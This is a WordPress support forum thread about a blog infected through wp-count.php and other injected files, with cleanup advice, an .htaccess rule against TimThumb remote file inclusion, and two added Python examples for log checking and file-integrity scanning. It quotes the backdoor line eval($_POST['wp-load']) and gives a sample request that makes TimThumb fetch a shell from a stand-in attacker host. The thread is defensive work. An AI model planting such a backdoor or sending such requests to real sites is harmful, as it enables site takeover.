Title: Malware from wp-count.php
Last modified: August 20, 2016

---

# Malware from wp-count.php

 *  [cosmocatalano](https://wordpress.org/support/users/cosmocatalano/)
 * (@cosmocatalano)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/)
 * Received a malware notification from Google Webmaster tools yesterday for my 
   cycling blog, [http://cyclocosm.com](http://cyclocosm.com), informing me that
   one post and two index pages (yearly for 2012, monthly for June 2012) were putting
   malware on visiting computers from 3rd-party URLs.
 * Reading through the malware report, it became evident that a file called **wp-count.php**
   was serving up JS downloads to users on page load. wp-count.php wasn’t part of a
   relatively clean WP install I had on a different site, and reading the contents of
   the file, it began “This file is protected by copyright law and provided under
   license. Reverse engineering of this file is strictly prohibited”—obviously,
   something was up.
 * I Googled **“wp-count.php”** and found some mentions of malware attacks, but
   no real fixes. Twitter search just pulled up this post in Japanese: [http://twitter.com/strive/status/217218845251870722](http://twitter.com/strive/status/217218845251870722)
 * The site was still on 3.4, so I updated to 3.4.1 and tried deleting and renaming
   wp-count.php, but it immediately reappeared. The next step I took was to **delete
   the contents of the file, and replace them with a single “0”**. So far this seems
   to have worked. Google has re-scanned the site and given it a clean bill of health.
 * I don’t have complete control over my site hosting, so I’m talking with my admin
   about reinstalling from a previous version, and then reposting the updates I’d
   made since then.
 * Anyone else encountering/encountered a similar issue?

Viewing 8 replies - 16 through 23 (of 23 total)


 *  [Amaryder](https://wordpress.org/support/users/amaryder/)
 * (@amaryder)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863090)
 * I’m using WordPress with the Genesis theme and this is the 3rd time I got malware
   called wp-count.php. I don’t know how they really injected this code again and
   again, but please help me to resolve this problem!
 *  [perezbox](https://wordpress.org/support/users/perezbox/)
 * (@perezbox)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863091)
 * Yeah, sorry, that really didn’t say anything.
 * What have you done the previous 2 times to get it resolved? Have you followed
   the steps already outlined above?
 * Have you read any of the posts offered by kmessinger?
 * I would also recommend reading this post: [http://blog.sucuri.net/2012/10/dealing-with-todays-wordpress-malware.html](http://blog.sucuri.net/2012/10/dealing-with-todays-wordpress-malware.html)
 * Thanks
 *  [Krishna](https://wordpress.org/support/users/1nexus/)
 * (@1nexus)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863092)
 * > I found both files wp-count and wp-app, which are not included by WordPress
   > I think. Reply me soon.
 * It is not necessarily the case that your site can be hacked only through the above
   files. If you found the same files, it only shows that it is a usual way to infect
   your site. There are several other routes for malware to penetrate and damage your
   sites. If you are hacked repeatedly, it means that you leave security holes every
   time you clean up. Or you may be hosted in an insecure environment that passes on
   infection from other sites on the same server.
 *  [Amaryder](https://wordpress.org/support/users/amaryder/)
 * (@amaryder)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863093)
 * [@krishna](https://wordpress.org/support/users/krishna/) bro, how to secure properly
   and resolve this malware problem? Bro, still getting notifications from Webmaster
   Tools, help me!
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [13 years, 7 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863094)
 * > how to secure properly and resolve this Malware problem
 * There are NO shortcuts.
 * Talk to your host. Find out if anyone else on the server was hacked. Let them
   know you were hacked so they can check the server.
 * You also need to start working your way through these resources:
    [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  [GiraffeDog](https://wordpress.org/support/users/giraffedog/)
 * (@giraffedog)
 * [13 years, 6 months ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863096)
 * Do you guys know if your theme is using timthumb.php or thumb.php to resize images?
   This seems to be how some sites are getting breached.
 * You need to check if you’re allowing timthumb.php to be called from remote websites
   (it’s in the prefs somewhere in the file).
 * Additionally you could try adding the following to your .htaccess file. It stops
   the requests dead.
 *     ```
       RewriteEngine On
   
       # TimThumb Forbid RFI By Host Name But Allow Internal Requests
       RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
       RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
       RewriteRule .* index.php [F,L]
       RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
       RewriteRule . – [S=1]‘
       ```
   
 * Source: [http://graphiclineweb.wordpress.com/2012/08/22/stop-timthumb-attacks-at-server/](http://graphiclineweb.wordpress.com/2012/08/22/stop-timthumb-attacks-at-server/)
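The mod_rewrite rule above forbids requests whose query string or request line carries a remote URL naming one of the hosts TimThumb used to allow on its remote-image list; attackers spoofed that list with look-alike hostnames (for example `blogger.com.attacker.example`) to make TimThumb fetch and cache a PHP file. As an added example, not code from the post or from the linked blog, the following Python mirrors that condition so it can be run over existing access-log lines to see which past requests the rule would have forbidden, including `%3A%2F%2F`-encoded variants. The log lines are constructed for the demo, and `classify`/`blocked_requests` are this example's own names.

```python
import re
from urllib.parse import unquote

# Host fragments copied from the .htaccess rule above (TimThumb's old remote-host
# allowlist, which attackers spoofed with look-alike hostnames).
HOST_FRAGMENTS = (
    r"blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|"
    r"wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame"
)

# Same expression the RewriteCond uses: a scheme, "://" (raw or %-encoded),
# optional "www", any one character, then one of the host fragments.
REMOTE_URL_RE = re.compile(
    r"(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(" + HOST_FRAGMENTS + r")",
    re.IGNORECASE,
)
# The thumbnail scripts named in the second RewriteCond.
THUMB_SCRIPT_RE = re.compile(r"(timthumb|phpthumb|thumb|thumbs)\.php", re.IGNORECASE)

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(log_line):
    """Return 'forbid' if the request matches the RFI pattern, 'thumb' for an
    ordinary request to a thumbnail script, otherwise 'pass'."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return "pass"
    path, _, query = m.group("target").partition("?")
    # Test the raw and the decoded query so double-encoded variants are caught too.
    if REMOTE_URL_RE.search(query) or REMOTE_URL_RE.search(unquote(query)):
        return "forbid"
    if THUMB_SCRIPT_RE.search(path):
        return "thumb"
    return "pass"


def blocked_requests(lines):
    """Subset of log lines the .htaccess rule would have answered with 403."""
    return [line for line in lines if classify(line) == "forbid"]


# Constructed sample access-log lines (example data, not from the thread).
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Aug/2012:10:01:02 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://blogger.com.evil.example/sh.php HTTP/1.1" 200 1234',
    '203.0.113.5 - - [12/Aug/2012:10:01:03 +0000] "GET /wp-content/themes/x/timthumb.php?src=http%3A%2F%2Fpicasa.example%2Fa.php HTTP/1.1" 200 1234',
    '198.51.100.7 - - [12/Aug/2012:10:02:00 +0000] "GET /wp-content/themes/x/timthumb.php?src=wp-content/uploads/2012/06/bike.jpg&w=300 HTTP/1.1" 200 5432',
    '198.51.100.7 - - [12/Aug/2012:10:02:01 +0000] "GET /2012/06/ HTTP/1.1" 200 8765',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

Running it over a real log (`python3 check.py < access.log` after swapping `SAMPLE_LOG` for `sys.stdin`) shows whether the script had already been probed before the rule went in; a hit with a 200 status means the fetch may have succeeded and the TimThumb cache directory should be inspected.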
 *  [hadoanngoc](https://wordpress.org/support/users/hadoanngoc/)
 * (@hadoanngoc)
 * [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863120)
 * My site was also infected by the wp-count and wp-apps.php files. So it’s been a year
   since this topic was raised but no solution? Is this really a WordPress vulnerability
   issue or a server configuration problem?
 * I did a Google search and also checked my site. I found these files are infected:
    * themes/[mytheme]/footer.php (…eval($_POST[‘wp-load’])..)
    * wp-apps.php and wp-count.php are added in the root folder
    * /wp-includes/js/js/*.php are added
    * /wp-includes/wp-var.php is added
    * index.php files
    * wp-register.php; xmlrpc.php; wp-comments-post.php; wp-links-opml.php files are infected
 * So finding the infected files is easy; I can remove the injected code or reinstall
   a fresh copy. But HOW are they infected? How can it change the file content
   and add new files??? Please, WordPress developers & masters?
 * (my site is on Centos 5 server, Apache 2.2 and PHP 5.4)
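The list above (new PHP files dropped into the web root and `wp-includes`, plus `eval($_POST[...])` injected into `footer.php` and core entry points) is exactly what a file-integrity comparison against a clean copy surfaces in one pass, which matters because earlier in the thread a deleted `wp-count.php` reappeared, meaning something else on the host was still writing it. As an added example, not code from the post or from WordPress, the following Python builds a SHA-256 manifest from a clean tree and reports files that are extra, modified, or match a few suspicious PHP patterns. The directory layout, file contents and pattern list are constructed for the demo; `manifest`, `scan` and `demo` are this example's own names.

```python
import hashlib
import os
import re
import tempfile

# Patterns modelled on the findings quoted above; a starting point, not a full signature set.
SUSPICIOUS = [
    re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\["),  # eval($_POST['wp-load'])
    re.compile(rb"This file is protected by copyright law"),        # wp-count.php header
    re.compile(rb"base64_decode\s*\("),                             # common obfuscation
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map each file's path (relative to root, '/'-separated) to its SHA-256."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_file(full)
    return out


def scan(site_root, clean_manifest):
    """Compare a live tree with a clean manifest; return sorted lists of
    extra files, modified files, and PHP files matching SUSPICIOUS."""
    site = manifest(site_root)
    extra = sorted(p for p in site if p not in clean_manifest)
    modified = sorted(p for p in site if p in clean_manifest and site[p] != clean_manifest[p])
    suspicious = []
    for rel in sorted(site):
        if not rel.endswith(".php"):
            continue
        with open(os.path.join(site_root, rel), "rb") as f:
            data = f.read()
        if any(pat.search(data) for pat in SUSPICIOUS):
            suspicious.append(rel)
    return {"extra": extra, "modified": modified, "suspicious": suspicious}


def _write(root, rel, content):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(content)


def demo():
    """Build a constructed clean tree and an infected copy of it, then scan the copy."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = os.path.join(tmp, "clean")
        site = os.path.join(tmp, "site")
        for root in (clean, site):
            _write(root, "index.php", b"<?php require 'wp-blog-header.php';\n")
            _write(root, "wp-content/themes/mytheme/footer.php", b"<?php wp_footer(); ?>\n")
        # Infections modelled on the post above (constructed contents):
        _write(site, "wp-count.php",
               b"<?php /* This file is protected by copyright law */ echo 1;\n")
        _write(site, "wp-content/themes/mytheme/footer.php",
               b"<?php eval($_POST['wp-load']); wp_footer(); ?>\n")
        _write(site, "wp-includes/js/js/x.php",
               b"<?php echo base64_decode($_GET['q']);\n")
        return scan(site, manifest(clean))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

On a real site, build the manifest from a freshly downloaded WordPress release of the same version (plus your theme and plugin zips), not from the live server, and treat `wp-config.php` and the uploads directory as expected differences; anything in `extra` that ends in `.php` under `wp-includes` or `uploads` deserves a look before the backdoor rewrites the files you just cleaned.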
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863121)
 * > Your blog being “hacked” is not a security issue. A security issue will involve
   > knowing how the attacker got in and hacked your site. If you have details on
   > the attack vector, then email us.
 * [http://codex.wordpress.org/FAQ_Security#What_is_a_.22security.22_issue.3F](http://codex.wordpress.org/FAQ_Security#What_is_a_.22security.22_issue.3F)
 * For starters, why are you using an older version of WordPress? The current version
   is 3.5.1 – not 3.4.1.
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 * Next time, and as per the [Forum Welcome](http://codex.wordpress.org/Forum_Welcome#Where_To_Post),
   please post your own topic instead of tagging onto a 9-month old topic.


The topic ‘Malware from wp-count.php’ is closed to new replies.

## Tags

 * [compromised site](https://wordpress.org/support/topic-tag/compromised-site/)
 * [javascript](https://wordpress.org/support/topic-tag/javascript/)
 * [page load](https://wordpress.org/support/topic-tag/page-load/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 23 replies
 * 13 participants
 * Last reply from: [esmi](https://wordpress.org/support/users/esmi/)
 * Last activity: [13 years ago](https://wordpress.org/support/topic/malware-from-wp-countphp/page/2/#post-2863121)
 * Status: not resolved
